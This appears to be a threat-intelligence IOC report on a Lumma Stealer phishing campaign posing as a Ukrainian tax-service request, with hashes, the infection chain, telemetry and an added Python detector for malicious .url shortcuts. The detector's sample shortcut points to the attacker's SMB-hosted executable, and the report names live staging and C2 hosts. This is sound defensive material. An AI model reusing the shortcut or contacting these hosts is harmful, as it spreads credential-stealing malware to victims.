VRad

#lumma_300124

Feb 2nd, 2024 (edited)
#IOC #OptiData #VR #Lumma #Stealer #LNK #SMB #RAR #PWD

https://pastebin.com/pgjwR07Z

previous_contact:
27/01/24 https://pastebin.com/4B3hwvpx
25/01/24 https://pastebin.com/pwL5HdeX

FAQ:
https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

attack_vector
--------------
email attach .7z > .rar (PWD) > .url > \\ 89_23_98_22 \ UR \ lmncr2rs.exe > crisisestimatehealtwh_site / api (C2)

# # # # # # # #
email_headers
# # # # # # # #
Date: Tue, 30 Jan 2024 08:52:51 +0300
Subject: Запит ДПСУ (Вимога)
From: Рак Ясногор Тимурович <facebook @ spacollection_hk>
Reply-To: Державна податкова служба України <post @ tax_gov_ua>
Received: from mail_spacollection_hk ([103_226_95_162])
Received: from WIN - LCETV91VPS6 (plum - development2_aeza_one [79_137_205_213])
Message-ID: <C35FA500- D8C7- 477E- A139- BA159B9F55CD @ mail_spacollection_hk>

# # # # # # # #
files
# # # # # # # #
SHA-256 34b826565968ff34edc9617c3f6d997ce9721baf514de310d2761bc203b81f81
File name Запит.7z [7-zip archive data, version 0.4]
File size 855 B (855 bytes)

SHA-256 57aaab5b85b3e0d4b6b3033d15bfbf170ab93da94188df339ef4401f76fe6762
File name doc.rar [RAR archive data, v5] !PWD
File size 446 B (446 bytes)

SHA-256 c73de9036435ed3a51b4864af55b159901914ddc0e90b0ca7d954a6e500cf26f
File name Офіційний запит.pdf.url [URL, Internet shortcut]
File size 170 B (170 bytes)

SHA-256 cc47d0324b09a84924c41bf62b955e73688483645489ae8638164feac38192d3
File name lmncr2rs.exe [.NET executable, SmartAssembly] !LUMMA
File size 10.85 MB (11374080 bytes)

SHA-256 d484cb34534d598e0597aa44ae065b7ff666922e481fcf4e83cb7d1011972266
File name unpacked.exe [PE32 executable] !LUMMA
File size 536.00 KB (548864 bytes)

# # # # # # # #
activity
# # # # # # # #

PL_SCR \\ 89_23_98_22 \ UR \ lmncr2rs.exe

C2 crisisestimatehealtwh_site / api


netwrk
--------------
89_23_98_22 445 SMB Negotiate Protocol Request
89_23_98_22 445 TCP 49348 → 445 [SYN]

comp
--------------
System 4 TCP 89_23_98_22 445 ESTABLISHED
System 4 TCP 89_23_98_22 445 ESTABLISHED

proc
--------------
Explorer.EXE \\ 89_23_98_22 \ UR \ lmncr2rs.exe
lmncr2rs.exe
lmncr2rs.exe

persist
--------------
n/a

drop
--------------
n/a
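
Added example (not code from the original paste or its author): a small defender-side Python check for the .url stage of the chain in the attack_vector and activity sections above, i.e. an Internet Shortcut whose target is a UNC path or file:// URL on an external host, which makes Windows fetch and run the executable over SMB (port 445) as soon as the user opens the "document". It also covers the two telemetry patterns this note records: the double-extension lure name (Офіційний запит.pdf.url) and Explorer.EXE starting an image straight from a UNC path. The .url body below is constructed from the defanged path in the note, since the paste does not include the shortcut's contents; the extension lists and the function names are assumptions of this example.

```python
"""Defender-side checks for the .url -> SMB execution stage of the chain in this
note. Added example, not code from the original paste; sample inputs below are
constructed (the paste gives the defanged UNC path, not the .url file body)."""
import configparser
import ipaddress
import posixpath
import re
from typing import Optional
from urllib.parse import unquote, urlparse

# Extensions Windows will execute when the shortcut target is opened (assumed list)
EXEC_EXTENSIONS = {".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".js", ".jse",
                   ".vbs", ".vbe", ".wsf", ".hta", ".lnk", ".msi", ".ps1"}
# Document extensions used to disguise a .url file, e.g. "report.pdf.url" (assumed list)
DOC_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# \\host\share\path
UNC_RE = re.compile(r"^\\\\([^\\]+)\\(.+)$")


def parse_url_shortcut(text: str) -> Optional[str]:
    """Return the URL= target of an Internet Shortcut (.url) file, or None."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text.lstrip("\ufeff"))  # tolerate a UTF-8 BOM
    for section in cp.sections():
        # option names are lower-cased by configparser; section names are not
        if section.lower() == "internetshortcut" and cp.has_option(section, "url"):
            return cp.get(section, "url").strip()
    return None


def remote_target(url: str):
    """Split a UNC path or file://host/ URL into (host, path). Returns None for
    http(s) targets and for local file paths, which this check does not cover."""
    m = UNC_RE.match(url)
    if m:
        return m.group(1), m.group(2).replace("\\", "/")
    parsed = urlparse(url)
    if parsed.scheme.lower() == "file" and parsed.netloc:
        return parsed.netloc, unquote(parsed.path).lstrip("/")
    return None


def host_is_external(host: str) -> bool:
    """True for globally routable IPs and dotted hostnames; single-label
    (intranet) names and private/reserved addresses are treated as internal."""
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        return "." in host


def assess_shortcut(text: str) -> dict:
    """Evaluate one .url body: flag targets that make Windows fetch and run a
    file over SMB from an external host as soon as the shortcut is opened."""
    url = parse_url_shortcut(text)
    result = {"url": url, "remote_host": None, "executable": False,
              "suspicious": False, "notes": []}
    target = remote_target(url) if url else None
    if target is None:
        return result
    host, path = target
    ext = posixpath.splitext(path)[1].lower()
    result["remote_host"] = host
    result["executable"] = ext in EXEC_EXTENSIONS
    if host_is_external(host):
        result["notes"].append(f"SMB/file target on external host {host}")
    if result["executable"]:
        result["notes"].append(f"target is an executable ({ext})")
    result["suspicious"] = bool(result["notes"])
    return result


def is_lure_filename(name: str) -> bool:
    """True for names such as 'report.pdf.url', where a document extension
    hides the real .url extension (Explorer never shows the .url part)."""
    parts = name.lower().rsplit(".", 2)
    return len(parts) == 3 and parts[2] == "url" and parts[1] in DOC_EXTENSIONS


def flag_unc_launch(parent_image: str, image_path: str) -> bool:
    """Process-creation check matching the proc section: an image started
    straight from a UNC path, either by the user's shell or from an external host."""
    m = UNC_RE.match(image_path)
    if not m:
        return False
    return parent_image.lower().endswith("explorer.exe") or host_is_external(m.group(1))


# Constructed .url body reproducing the defanged path from the note; the real
# file's contents are not in the paste.
SAMPLE_URL_FILE = """[InternetShortcut]
URL=file://89.23.98.22/UR/lmncr2rs.exe
IconIndex=13
"""
BENIGN_URL_FILE = """[InternetShortcut]
URL=https://www.example.com/
"""

if __name__ == "__main__":
    for body in (SAMPLE_URL_FILE, BENIGN_URL_FILE):
        print(assess_shortcut(body))
    print(is_lure_filename("Офіційний запит.pdf.url"))
    print(flag_unc_launch(r"C:\Windows\Explorer.EXE", r"\\89.23.98.22\UR\lmncr2rs.exe"))
```

Run it on extracted mail attachments (after unpacking the archive with the password given in the lure) or feed `flag_unc_launch` with parent/image pairs from process-creation telemetry; the same host check can be applied to the destination of any outbound SMB (445) connection, which in this case was opened by the System process, as the comp section shows.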

# # # # # # # #
additional info
# # # # # # # #
n/a

# # # # # # # #
VT & Intezer
# # # # # # # #
https://www.virustotal.com/gui/file/34b826565968ff34edc9617c3f6d997ce9721baf514de310d2761bc203b81f81/details
https://www.virustotal.com/gui/file/57aaab5b85b3e0d4b6b3033d15bfbf170ab93da94188df339ef4401f76fe6762/details
https://www.virustotal.com/gui/file/c73de9036435ed3a51b4864af55b159901914ddc0e90b0ca7d954a6e500cf26f/details
https://www.virustotal.com/gui/file/cc47d0324b09a84924c41bf62b955e73688483645489ae8638164feac38192d3/details
https://www.virustotal.com/gui/file/d484cb34534d598e0597aa44ae065b7ff666922e481fcf4e83cb7d1011972266/details

VR